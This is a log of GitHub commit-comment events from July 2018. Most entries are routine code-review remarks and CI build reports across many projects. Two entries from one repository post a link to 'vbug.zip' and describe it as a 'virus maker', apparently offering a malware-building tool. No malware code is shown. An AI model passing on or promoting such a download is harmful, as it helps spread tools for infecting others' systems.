{"id":"7930120850","type":"CommitCommentEvent","actor":{"login":"rousskov"},"repo":{"name":"measurement-factory/squid"},"payload":{"comment":{"id":29624271,"position":6,"line":341,"path":"src/store.cc","commit_id":"e4aab7b83d620f2f0d45f636848d619387ec7339","created_at":"2018-07-06T17:32:13Z","updated_at":"2018-07-06T17:32:13Z","author_association":"NONE","body":"> no memory benefit: anyway, we need to store a StoreEntryPacker pointer\r\n\r\nNo, we do not need to store that pointer (in StoreEntry at all and anywhere long-term):\r\n\r\n```\r\nStoreEntryPacker packer(e);\r\nsomeFunctionCallThatNeedsPacker(&packer, ...);\r\n```\r\n\r\n> no performance benefit, due to indirect calls of Packable\r\n\r\nIn many/most cases, that would be true. In cases where the compiler sees both the calling code and the function implementation, it may be able to drop virtual lookups (because the end type will be known). This is one of the reasons to keep StoreEntryPacker simple and inlined."}},"created_at":"2018-07-06T17:32:13Z"}
{"id":"7930122544","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624276,"position":110,"line":996,"path":"compiler/typecheck/TcHsType.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:32:38Z","updated_at":"2018-07-06T17:32:38Z","author_association":"NONE","body":"This can be improved."}},"created_at":"2018-07-06T17:32:38Z"}
{"id":"7930123171","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29624278,"position":null,"line":null,"path":null,"commit_id":"89b03a30acd565b4afb53870de3c8317ab272c10","created_at":"2018-07-06T17:32:47Z","updated_at":"2018-07-06T17:32:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-419](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-419).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-419-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T17:32:47Z"}
{"id":"7930123784","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29624279,"position":27,"line":22,"path":"ruby_module_8/wagon.rb","commit_id":"eed8146444ca3172b9e1fd435df8c86f48a61da6","created_at":"2018-07-06T17:32:56Z","updated_at":"2018-07-06T17:32:56Z","author_association":"NONE","body":"здесь есть следующие минусы\r\n1. ты не хранишь значение общего объема вагона\r\nоно есть при создании вагона, что правильно, потому что любая тара имеющая объем обычно имеет надпись\r\n(1 литр, 130 м3 и т.д.)\r\nкогда вагон начинают загружать, ты это значение теряешь и вагон уже не может сообщить тебе о своем объеме\r\nмне кажется, что это очень неправильно\r\n2. обрати внимание эти 2 строки... в первой ты отнимаешь значение, во второй точно такое же добавляешь...\r\nесли подумать, то эти две переменные зависимы друг от друга, обслуживать их раздельно -  - это плохая идея, усложняющая код и усложняющая поддержку этого кода\r\n"}},"created_at":"2018-07-06T17:32:56Z"}
{"id":"7930125983","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29624286,"position":46,"line":2389,"path":"FHEM/00_SIGNALduino.pm","commit_id":"d4694ed2d9ad75a361bc5c70e30238e5040433de","created_at":"2018-07-06T17:33:27Z","updated_at":"2018-07-06T17:33:27Z","author_association":"CONTRIBUTOR","body":"wenn das $rawData Ende erreicht wurde, dann kann die for Schleife abgebrochen werden "}},"created_at":"2018-07-06T17:33:27Z"}
{"id":"7930127697","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29624291,"position":112,"line":998,"path":"compiler/typecheck/TcHsType.hs","commit_id":"5a34f3ea09a6e30ad913596b741a911fb3580c0d","created_at":"2018-07-06T17:33:54Z","updated_at":"2018-07-06T17:33:54Z","author_association":"NONE","body":"change to `applyTypeToArgs`"}},"created_at":"2018-07-06T17:33:54Z"}
{"id":"7930134918","type":"CommitCommentEvent","actor":{"login":"aminxxx133"},"repo":{"name":"aminxxx133/jancoxx"},"payload":{"comment":{"id":29624313,"position":null,"line":null,"path":null,"commit_id":"e9a71791e8b04ac8e7d18996f4b8075c43c148ce","created_at":"2018-07-06T17:35:44Z","updated_at":"2018-07-06T17:35:44Z","author_association":"OWNER","body":"\r\n[vbug.zip](https://github.com/aminxxx133/jancoxx/files/2171442/vbug.zip)\r\n"}},"created_at":"2018-07-06T17:35:44Z"}
{"id":"7930135344","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29624314,"position":null,"line":null,"path":null,"commit_id":"c38907683338f3dd4e6f34bc4359552549e5a787","created_at":"2018-07-06T17:35:51Z","updated_at":"2018-07-06T17:35:51Z","author_association":"COLLABORATOR","body":"А на F4 есть файл с константами альтернативности:\r\nhttps://github.com/ArmatureCurrent/stm32async/blob/master/device_support/STM32F4xx_HAL_Driver/Inc/stm32f4xx_hal_gpio_ex.h\r\nВ GPIO_InitTypeDef::Alternate просто указывается нужное значение, и все. Больше ничего делать не надо. Дальше, как я понял, всю работу делает HAL_GPIO_Init "}},"created_at":"2018-07-06T17:35:51Z"}
{"id":"7930135552","type":"CommitCommentEvent","actor":{"login":"aminxxx133"},"repo":{"name":"aminxxx133/jancoxx"},"payload":{"comment":{"id":29624315,"position":null,"line":null,"path":null,"commit_id":"e9a71791e8b04ac8e7d18996f4b8075c43c148ce","created_at":"2018-07-06T17:35:54Z","updated_at":"2018-07-06T17:35:54Z","author_association":"OWNER","body":"virus maker"}},"created_at":"2018-07-06T17:35:54Z"}
{"id":"7930135592","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"LuisR97/chatarang"},"payload":{"comment":{"id":29624317,"position":null,"line":null,"path":null,"commit_id":"c1ee56c4fe9d4ca56759f89ead7e9ec3711d6141","created_at":"2018-07-06T17:35:54Z","updated_at":"2018-07-06T17:35:54Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T17:35:54Z"}
{"id":"7930137085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29624324,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T17:36:17Z","updated_at":"2018-07-06T17:36:17Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T17:36:17Z"}
{"id":"7930138616","type":"CommitCommentEvent","actor":{"login":"eduard-bagdasaryan"},"repo":{"name":"measurement-factory/squid"},"payload":{"comment":{"id":29624329,"position":18,"line":54,"path":"src/Store.h","commit_id":"e4aab7b83d620f2f0d45f636848d619387ec7339","created_at":"2018-07-06T17:36:39Z","updated_at":"2018-07-06T17:36:39Z","author_association":"NONE","body":"Done in d073abc."}},"created_at":"2018-07-06T17:36:39Z"}
{"id":"7930140776","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29624332,"position":8,"line":80,"path":"scripts/microbe_stage/movement_organelle.as","commit_id":"86fc41084d796cd3cefe707b54dd1f132358ba17","created_at":"2018-07-06T17:37:09Z","updated_at":"2018-07-06T17:37:09Z","author_association":"CONTRIBUTOR","body":"There needs to be added a ton of debug printing with every variant and then also in the GetExternalOrganelle method to see what is actually going on"}},"created_at":"2018-07-06T17:37:09Z"}
{"id":"7930142129","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29624334,"position":null,"line":null,"path":null,"commit_id":"3d0ee17c916eca85ee28b8e716b6203f6d7fbf1c","created_at":"2018-07-06T17:37:28Z","updated_at":"2018-07-06T17:37:28Z","author_association":"CONTRIBUTOR","body":"Note that this is specific for some urxvt extension, not urxvt itself.\r\nSee https://github.com/neovim/neovim/issues/8695."}},"created_at":"2018-07-06T17:37:28Z"}
{"id":"7930142968","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29624338,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T17:37:41Z","updated_at":"2018-07-06T17:37:41Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T17:37:41Z"}
{"id":"7930147592","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29624346,"position":20,"line":44,"path":"ruby_module_8/station.rb","commit_id":"eed8146444ca3172b9e1fd435df8c86f48a61da6","created_at":"2018-07-06T17:38:45Z","updated_at":"2018-07-06T17:38:45Z","author_association":"NONE","body":"при использовании `yield` не нужно передавать / принимать блок в аргументах\r\n"}},"created_at":"2018-07-06T17:38:45Z"}
{"id":"7930152090","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29624353,"position":7,"line":46,"path":"ruby_module_8/train.rb","commit_id":"eed8146444ca3172b9e1fd435df8c86f48a61da6","created_at":"2018-07-06T17:39:47Z","updated_at":"2018-07-06T17:39:47Z","author_association":"NONE","body":"то же самое, в аргументах блок не нужен"}},"created_at":"2018-07-06T17:39:47Z"}
{"id":"7930153674","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29624359,"position":null,"line":null,"path":null,"commit_id":"c38907683338f3dd4e6f34bc4359552549e5a787","created_at":"2018-07-06T17:40:12Z","updated_at":"2018-07-06T17:40:12Z","author_association":"OWNER","body":"С коммитом Вы меня опередили, поэтому не покажу;) Да, у Вас помощнее HAL будет."}},"created_at":"2018-07-06T17:40:12Z"}
{"id":"7930155531","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"chawlav98/Chatarang"},"payload":{"comment":{"id":29624363,"position":null,"line":null,"path":null,"commit_id":"6084c3a8bb1710b515e01d903e52037f5f9eef1f","created_at":"2018-07-06T17:40:37Z","updated_at":"2018-07-06T17:40:37Z","author_association":"NONE","body":"👍 Try to commit more often so they're smaller and you can tell what changes were made."}},"created_at":"2018-07-06T17:40:37Z"}
{"id":"7930156597","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"chawlav98/Chatarang"},"payload":{"comment":{"id":29624364,"position":null,"line":null,"path":null,"commit_id":"c9870484ab1abeccd9a27f4a76f9f6011b583977","created_at":"2018-07-06T17:40:53Z","updated_at":"2018-07-06T17:40:53Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T17:40:53Z"}
{"id":"7930157591","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"chawlav98/Chatarang"},"payload":{"comment":{"id":29624368,"position":null,"line":null,"path":null,"commit_id":"8f21ba52050ee97633eca6ab6d33ab75cde0045e","created_at":"2018-07-06T17:41:08Z","updated_at":"2018-07-06T17:41:08Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T17:41:08Z"}
{"id":"7930158082","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"chawlav98/Chatarang"},"payload":{"comment":{"id":29624369,"position":null,"line":null,"path":null,"commit_id":"b4979154f91f3185cfe2d1f567fc0baf03424722","created_at":"2018-07-06T17:41:14Z","updated_at":"2018-07-06T17:41:14Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T17:41:14Z"}
{"id":"7930164495","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Deafviper/chatarang"},"payload":{"comment":{"id":29624385,"position":null,"line":null,"path":null,"commit_id":"2db41acd045079025b66956efd600bee908fbf1c","created_at":"2018-07-06T17:42:47Z","updated_at":"2018-07-06T17:42:47Z","author_association":"NONE","body":"Good work using CSS in JS."}},"created_at":"2018-07-06T17:42:47Z"}
{"id":"7930165329","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Deafviper/chatarang"},"payload":{"comment":{"id":29624386,"position":null,"line":null,"path":null,"commit_id":"1629ef47500462b5296ce8bbac6036236d5974a1","created_at":"2018-07-06T17:43:00Z","updated_at":"2018-07-06T17:43:00Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T17:43:00Z"}
{"id":"7930166790","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Deafviper/chatarang"},"payload":{"comment":{"id":29624390,"position":null,"line":null,"path":null,"commit_id":"ba42a1694c0180fd09f48f5c591d5d30d4cfbb7a","created_at":"2018-07-06T17:43:20Z","updated_at":"2018-07-06T17:43:20Z","author_association":"NONE","body":"This is a pretty big commit messages. Try breaking them up into smaller commits. 👍 "}},"created_at":"2018-07-06T17:43:20Z"}
{"id":"7930169331","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29624403,"position":21,"line":2318,"path":"FHEM/00_SIGNALduino.pm","commit_id":"d4694ed2d9ad75a361bc5c70e30238e5040433de","created_at":"2018-07-06T17:43:53Z","updated_at":"2018-07-06T17:43:53Z","author_association":"CONTRIBUTOR","body":"wenn diese Bedingung erfüllt ist\r\n`$i+$signal_width>length($rawData)-$signal_width`\r\ndann zeigt $i auf ein gültigen $sig_str\r\nDies konnte dann hier Probleme machen\r\n```\r\n#Find next position of valid signal (skip invalid pieces)\r\nmy $regex=\".{$i}\".$startStr.$signal_regex;\r\n```\r\n"}},"created_at":"2018-07-06T17:43:53Z"}
{"id":"7930175419","type":"CommitCommentEvent","actor":{"login":"firstone"},"repo":{"name":"UniversalDevicesInc/polyglot-v2-python-interface"},"payload":{"comment":{"id":29624429,"position":null,"line":null,"path":null,"commit_id":"01fdc0ee9e0b8e457a6ab194a4dc8619f56f5d86","created_at":"2018-07-06T17:45:21Z","updated_at":"2018-07-06T17:45:21Z","author_association":"COLLABORATOR","body":"Yeah, I've updated it afterward. Current pull request should be correct."}},"created_at":"2018-07-06T17:45:21Z"}
{"id":"7930175545","type":"CommitCommentEvent","actor":{"login":"biadias99"},"repo":{"name":"biadias99/matrizes"},"payload":{"comment":{"id":29624430,"position":null,"line":null,"path":null,"commit_id":"c136932f25074efe2b25265a56738899647313e0","created_at":"2018-07-06T17:45:23Z","updated_at":"2018-07-06T17:45:23Z","author_association":"OWNER","body":"Ainda preciso verificar se todos os números da linha são diferentes"}},"created_at":"2018-07-06T17:45:23Z"}
{"id":"7930195579","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29624469,"position":null,"line":null,"path":null,"commit_id":"20dcc5e4eea0c70e8f472df80e2708a09584a76b","created_at":"2018-07-06T17:50:13Z","updated_at":"2018-07-06T17:50:13Z","author_association":"MEMBER","body":"Added."}},"created_at":"2018-07-06T17:50:13Z"}
{"id":"7930195969","type":"CommitCommentEvent","actor":{"login":"bogdan7900"},"repo":{"name":"bogdan7900/hello-world"},"payload":{"comment":{"id":29624471,"position":null,"line":null,"path":null,"commit_id":"30707bb40797631f4dbb533e8ecaa0ad0c2435d2","created_at":"2018-07-06T17:50:17Z","updated_at":"2018-07-06T17:50:17Z","author_association":"OWNER","body":"This worked great from local to remote. Commit #9."}},"created_at":"2018-07-06T17:50:17Z"}
{"id":"7930200230","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29624482,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-06T17:51:16Z","updated_at":"2018-07-06T17:51:16Z","author_association":"NONE","body":":) We are sticking to last known Ayufan stable build for now, while for Midgard and other things I lost track due to many changes in Rockchip kernel lately. I don't pay attention to that. Must be somewhere under https://forum.armbian.com/search/?&q=3328%20midgard&search_and_or=or&sortby=relevancy"}},"created_at":"2018-07-06T17:51:16Z"}
{"id":"7930202772","type":"CommitCommentEvent","actor":{"login":"marc2k3"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29624489,"position":null,"line":null,"path":null,"commit_id":"57393822ae42e1ebd77911c0f934471903975b4e","created_at":"2018-07-06T17:51:52Z","updated_at":"2018-07-06T17:51:52Z","author_association":"NONE","body":"I don't think you can use an unmodified Scintilla because the classname here must be unique...\r\n\r\nhttps://github.com/TheQwertiest/foo-jscript-panel/blob/foo_spider_monkey_panel/scintilla/win32/ScintillaWin.cxx#L126\r\n\r\nAnd the classname here...\r\n\r\nhttps://github.com/TheQwertiest/foo-jscript-panel/blob/foo_spider_monkey_panel/scintilla/win32/ScintillaWin.cxx#L3152\r\n\r\nneeds to match the name used inside the resource file here...\r\n\r\nhttps://github.com/TheQwertiest/foo-jscript-panel/blob/foo_spider_monkey_panel/foo_spider_monkey_panel/foo_spider_monkey_panel.rc#L62\r\n\r\nI already expect you're getting Scinitilla errors on startup if you have JScript Panel installed at the same time. foobar randomises the order of component loading so the error will come from whichever component gets loaded last. IIRC Zao is using the Scintilla defaults with foo_wave_seekbar.\r\n\r\nAlso, the current scintilla is currently customised with suport for all other lexers removed as it bloats the file size but I suppose this component is massive anyway???\r\n\r\n"}},"created_at":"2018-07-06T17:51:52Z"}
{"id":"7930206295","type":"CommitCommentEvent","actor":{"login":"natrist"},"repo":{"name":"thejobelrepos/taiga-front"},"payload":{"comment":{"id":29624497,"position":null,"line":null,"path":null,"commit_id":"7ce45801539e434bd5257d5bee551b6d7518cf78","created_at":"2018-07-06T17:52:42Z","updated_at":"2018-07-06T17:52:42Z","author_association":"COLLABORATOR","body":"Fixes a bug where saving a new ticket without any time spent value would cause a server-side error."}},"created_at":"2018-07-06T17:52:42Z"}
{"id":"7930209175","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29624504,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-06T17:53:22Z","updated_at":"2018-07-06T17:53:22Z","author_association":"MEMBER","body":"Shut up barbz the bug is it would make all mobs neutral to all other creatures/npcs"}},"created_at":"2018-07-06T17:53:22Z"}
{"id":"7930210787","type":"CommitCommentEvent","actor":{"login":"keerthan2"},"repo":{"name":"iitmcvg/Content"},"payload":{"comment":{"id":29624509,"position":null,"line":null,"path":null,"commit_id":"741b08218e7f0062e6fdb6dfa911636f563bb27f","created_at":"2018-07-06T17:53:45Z","updated_at":"2018-07-06T17:53:45Z","author_association":"CONTRIBUTOR","body":"Colour Spaces and Image Transformations"}},"created_at":"2018-07-06T17:53:45Z"}
{"id":"7930211369","type":"CommitCommentEvent","actor":{"login":"ishaboo"},"repo":{"name":"ishaboo/ruby-graphic"},"payload":{"comment":{"id":29624511,"position":null,"line":null,"path":null,"commit_id":"f9c845ac009b5c6225425cb16176cc8214ae7979","created_at":"2018-07-06T17:53:54Z","updated_at":"2018-07-06T17:53:54Z","author_association":"OWNER","body":"Laser doesnt work yet!"}},"created_at":"2018-07-06T17:53:54Z"}
{"id":"7930218547","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29624527,"position":7,"line":46,"path":"ruby_module_8/train.rb","commit_id":"eed8146444ca3172b9e1fd435df8c86f48a61da6","created_at":"2018-07-06T17:55:35Z","updated_at":"2018-07-06T17:55:35Z","author_association":"NONE","body":"такс... в фале `interface_train` ты в этот метод передаешь блок в аргументах\r\nзачем тогда здесь `yield` ?\r\nи почему ты не обращаеься к блоку ?\r\nты все смешал, надо бы повторить материал\r\nтак в принципе работать будет, но так не пишут\r\nлибо ты пишешь метод без блока в аргументах и используешь `yield` (рекомендуемый для большинства случаев способ, т.к. самый производительный)\r\nлибо ты передаешь блок в явном виде и в таком же явном виде его вызываешь\r\nне через `yield`, а через `call`"}},"created_at":"2018-07-06T17:55:35Z"}
{"id":"7930220186","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29624528,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-06T17:55:59Z","updated_at":"2018-07-06T17:55:59Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - i386-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T17:55:59Z"}
{"id":"7930227679","type":"CommitCommentEvent","actor":{"login":"FNCxPro"},"repo":{"name":"qconrad/intellistar-emulator"},"payload":{"comment":{"id":29624539,"position":null,"line":null,"path":null,"commit_id":"fceda0b6fb3419cfe5edd98d0152d460a9b9bfdf","created_at":"2018-07-06T17:57:45Z","updated_at":"2018-07-06T17:57:45Z","author_association":"CONTRIBUTOR","body":"Sorry, completely forgot about doing that"}},"created_at":"2018-07-06T17:57:45Z"}
{"id":"7930227879","type":"CommitCommentEvent","actor":{"login":"PoLaKoSz"},"repo":{"name":"tonykaralis/MoodMovies"},"payload":{"comment":{"id":29624540,"position":null,"line":null,"path":null,"commit_id":"1b2d0c36b8980cd6c5a3c412e9f4d16e810646e7","created_at":"2018-07-06T17:57:48Z","updated_at":"2018-07-06T17:57:48Z","author_association":"CONTRIBUTOR","body":"All right"}},"created_at":"2018-07-06T17:57:48Z"}
{"id":"7930233887","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29624550,"position":null,"line":null,"path":null,"commit_id":"1c32c86fcc2ee3759d91b012f64fa8d509e57a19","created_at":"2018-07-06T17:59:09Z","updated_at":"2018-07-06T17:59:09Z","author_association":"COLLABORATOR","body":"Puzzle `1302-97bdfff0` discovered in   [`src/test/resources/com/zerocracy/bundles/resign_on_delay/_after.groovy`](  https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/resign_on_delay/_after.groovy)   and submitted as #1364. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-06T17:59:09Z"}
{"id":"7930235115","type":"CommitCommentEvent","actor":{"login":"riknoll"},"repo":{"name":"Microsoft/pxt-common-packages"},"payload":{"comment":{"id":29624554,"position":179,"line":179,"path":"libs/mixer/melody.ts","commit_id":"d9dc9c7011af86c45af907476a734a8eea740c66","created_at":"2018-07-06T17:59:28Z","updated_at":"2018-07-06T17:59:28Z","author_association":"MEMBER","body":"Looks good to me! I'm very glad you chose `~` for the waveform"}},"created_at":"2018-07-06T17:59:28Z"}
{"id":"7930239222","type":"CommitCommentEvent","actor":{"login":"annthurium"},"repo":{"name":"atom/github"},"payload":{"comment":{"id":29624572,"position":8,"line":200,"path":"lib/views/push-pull-view.js","commit_id":"9c279aebfbb7d492593226d732b17dc0dba73346","created_at":"2018-07-06T18:00:27Z","updated_at":"2018-07-06T18:00:27Z","author_association":"CONTRIBUTOR","body":"would you mind filing an issue with reproduction steps?"}},"created_at":"2018-07-06T18:00:27Z"}
{"id":"7930241283","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt-common-packages"},"payload":{"comment":{"id":29624583,"position":179,"line":179,"path":"libs/mixer/melody.ts","commit_id":"d9dc9c7011af86c45af907476a734a8eea740c66","created_at":"2018-07-06T18:00:56Z","updated_at":"2018-07-06T18:00:56Z","author_association":"MEMBER","body":"Sure! I'm especially proud of the at sign - email, letter, envelope ;))"}},"created_at":"2018-07-06T18:00:56Z"}
{"id":"7930248328","type":"CommitCommentEvent","actor":{"login":"Mohamed-Abdallah-Ahmed"},"repo":{"name":"Mohamed-Abdallah-Ahmed/firsttestproject"},"payload":{"comment":{"id":29624597,"position":null,"line":null,"path":null,"commit_id":"cf9b1d540cfc3da485fa8335a2f4c5cbf68fe5ba","created_at":"2018-07-06T18:02:38Z","updated_at":"2018-07-06T18:02:38Z","author_association":"OWNER","body":"new style for  Header 2 "}},"created_at":"2018-07-06T18:02:38Z"}
{"id":"7930248625","type":"CommitCommentEvent","actor":{"login":"zhuangya"},"repo":{"name":"ohjames/rxjs-websockets"},"payload":{"comment":{"id":29624598,"position":null,"line":null,"path":null,"commit_id":"cb2eb66c02e5228168a338a3d858724246cda91e","created_at":"2018-07-06T18:02:43Z","updated_at":"2018-07-06T18:02:43Z","author_association":"NONE","body":"why ignore it?"}},"created_at":"2018-07-06T18:02:43Z"}
{"id":"7930251593","type":"CommitCommentEvent","actor":{"login":"rogerhub"},"repo":{"name":"atom/github"},"payload":{"comment":{"id":29624602,"position":8,"line":200,"path":"lib/views/push-pull-view.js","commit_id":"9c279aebfbb7d492593226d732b17dc0dba73346","created_at":"2018-07-06T18:03:27Z","updated_at":"2018-07-06T18:03:27Z","author_association":"NONE","body":"This doesn't actually affect me, but I noticed it while poking around this code. But thanks for taking a look!"}},"created_at":"2018-07-06T18:03:27Z"}
{"id":"7930254971","type":"CommitCommentEvent","actor":{"login":"myMiracle18"},"repo":{"name":"myMiracle18/datasciencecoursera"},"payload":{"comment":{"id":29624607,"position":null,"line":null,"path":null,"commit_id":"a878f2dda18026e83c83b7c05b8ad624974c3f90","created_at":"2018-07-06T18:04:19Z","updated_at":"2018-07-06T18:04:19Z","author_association":"OWNER","body":"## This is a markdown file"}},"created_at":"2018-07-06T18:04:19Z"}
{"id":"7930257448","type":"CommitCommentEvent","actor":{"login":"a-stjohn"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624620,"position":376,"line":921,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T18:04:59Z","updated_at":"2018-07-06T18:04:59Z","author_association":"CONTRIBUTOR","body":"When tested, this feature (:guilabel:`Create directory`) didn't exist?"}},"created_at":"2018-07-06T18:04:59Z"}
{"id":"7930257889","type":"CommitCommentEvent","actor":{"login":"adhal007"},"repo":{"name":"adhal007/adhal007.github.io"},"payload":{"comment":{"id":29624622,"position":null,"line":null,"path":null,"commit_id":"372f8d9bee2415ff8355d1a8b70cad1ba8d14232","created_at":"2018-07-06T18:05:07Z","updated_at":"2018-07-06T18:05:07Z","author_association":"OWNER","body":"restored"}},"created_at":"2018-07-06T18:05:07Z"}
{"id":"7930267881","type":"CommitCommentEvent","actor":{"login":"lenerd"},"repo":{"name":"encryptogroup/ABY"},"payload":{"comment":{"id":29624644,"position":null,"line":null,"path":null,"commit_id":"f6f3ade58797a0965ad0628fa56c8b7e54a2f7b0","created_at":"2018-07-06T18:07:28Z","updated_at":"2018-07-06T18:07:28Z","author_association":"MEMBER","body":"Moin @sebastianst,\r\nI am planning to do that and I can start with the mentioned header files."}},"created_at":"2018-07-06T18:07:28Z"}
{"id":"7930277238","type":"CommitCommentEvent","actor":{"login":"dojo-json"},"repo":{"name":"CodingDojo-MEAN-06-18/David_W"},"payload":{"comment":{"id":29624665,"position":1,"line":1,"path":"Week 1/promises.js","commit_id":"7ee0005393a234f7cfe75d8c74fe8942292e55f9","created_at":"2018-07-06T18:09:54Z","updated_at":"2018-07-06T18:09:54Z","author_association":"NONE","body":"You might consider renaming the parameters passed to `getStuffFromDatabase` to something like `onSuccess` and `onError`. Makes it clear (assuming one knows nothing of Promises) the purpose of those callbacks. "}},"created_at":"2018-07-06T18:09:54Z"}
